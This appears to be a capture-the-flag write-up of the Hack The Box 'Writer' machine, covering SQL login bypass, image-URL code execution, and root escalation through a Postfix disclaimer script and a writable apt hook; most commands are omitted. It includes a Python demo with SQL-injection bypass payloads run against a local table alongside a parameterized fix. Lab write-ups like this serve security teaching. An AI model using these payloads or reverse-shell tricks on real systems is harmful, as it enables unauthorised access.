🔎🦶Enumeration/Foothold
Writer is a Medium box from HTB created by TheCyberGeek. This box features a website with a SQL login bypass and an img_url parameter exploit that allows us to execute code. Once on the box we find a Postfix disclaimer script and an apt configuration we can abuse to get root.
Before I begin each machine I kick off a full-port nmap scan. Note that -T5 should normally not be used with this scan profile, as the aggressive timing can miss ports or return incorrect results:
Reviewing the results, I can see ports 22, 80 and 445 open. Starting with SMB, I use enum4linux for enumeration and access the share directly. I have no rights to the folders, but I do find some accounts/users:
Next, I navigate to the website sitting on port 80. I've recently been trying to use ffuf more in my day-to-day work, but I've highlighted Feroxbuster as well:

Story Bank website sitting on Port 80.
Running the directory scans reveals an administrative directory, and navigating to it shows a login page. I enter admin/password in the fields and capture the request in Burp Suite. I replace the parameter values with placeholder keywords so the fuzz positions are easy to identify, then copy the request into a req.txt file. I use ffuf with that request to fuzz the username/password fields for possible SQL injection or login bypass.
I get a hit:

Story Bank Dashboard after the SQL Login Bypass.
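To show what the fuzzing run above is actually finding, here is an added example (not the Story Bank application's code or schema, which the writeup never shows) that rebuilds a login check against a constructed in-memory SQLite table. It runs a small wordlist of the kind fed to ffuf through a string-formatted query and through a parameterized one, and reports which payloads log in with a wrong password. The table contents, the payload list and the function names are all my own assumptions for illustration.

```python
import sqlite3

# Constructed stand-in for the site's user table; this is a generic
# illustration, not the Story Bank application's code or schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cr3t!')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Login check built by string formatting: what a login bypass targets."""
    query = (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with bound parameters: the payload stays a literal string."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# A small wordlist of the kind fed to ffuf; each entry goes in the username
# field with a deliberately wrong password, so any successful login is a bypass.
PAYLOADS = [
    "admin",               # control: right name, wrong password
    "admin'-- -",          # comment out the password check
    "' OR 1=1-- -",        # tautology, rest of the query commented out
    "' OR '1'='1",         # tautology, but AND binds tighter than OR: no bypass from the username field
    "admin' AND '1'='2",   # always false
]


def find_bypasses(conn, payloads, login_fn=login_vulnerable):
    """Report which payloads log in with a wrong password (what the ffuf
    run does over HTTP by watching for a different response)."""
    hits = []
    for payload in payloads:
        try:
            if login_fn(conn, payload, "wrong-password") is not None:
                hits.append(payload)
        except sqlite3.Error:
            pass  # a syntax error is noise, not a hit
    return hits


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", find_bypasses(db, PAYLOADS))        # two hits
    print("parameterized:", find_bypasses(db, PAYLOADS, login_safe))  # none
```

The `' OR '1'='1` entry is the caveat worth remembering when reading fuzz results: in the username field it fails because the injected `OR` is evaluated before the `AND password = ...` clause, yet the same string placed in the password field logs in as the first user in the table. Fuzz both fields, not just one.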
After logging in I am presented with a dashboard, including an area to edit stories. After some trial and error I realize that if I intercept the request with Burp Suite I can also change the image URL so that code added to the end of the image is executed:
⚠ Attack Machine
I click Edit Story, then Browse, and upload exploit.jpg (created in the steps above), then browse to HERE to verify. Next, I upload a second image and intercept the request in Burp Suite, changing the img_url parameter to:

Using the Edit Story to upload a malicious jpg on HTB Writer.
A few seconds later the shell pops. I load LinPEAS onto the box and notice /etc/postfix/disclaimer running every 5 minutes. I've previously run across a similar privesc involving the disclaimer script. Reviewing the script, I add a reverse shell:
⚠ Attack Machine
I then create a basic send-mail script based off HERE and upload both files to the server:
I pull them both onto the server into a folder called crx. Once pulled, I run the send-mail script alongside the disclaimer copy, since the task above runs frequently:
🎯 Victim Machine
On my attack machine I catch the reverse shell after transferring the files:
⚠ Attack Machine
Once the shell lands, I grab John's SSH key and log back into the box over SSH:
🎯 Victim Machine
🔝Escalation to Root
⚠ Attack Machine
I run LinPEAS again and notice apt running as root. I can also see that the file is writable:
GTFOBins confirms my hunch. I echo a one-liner bash reverse shell into the file and wait for the shell.
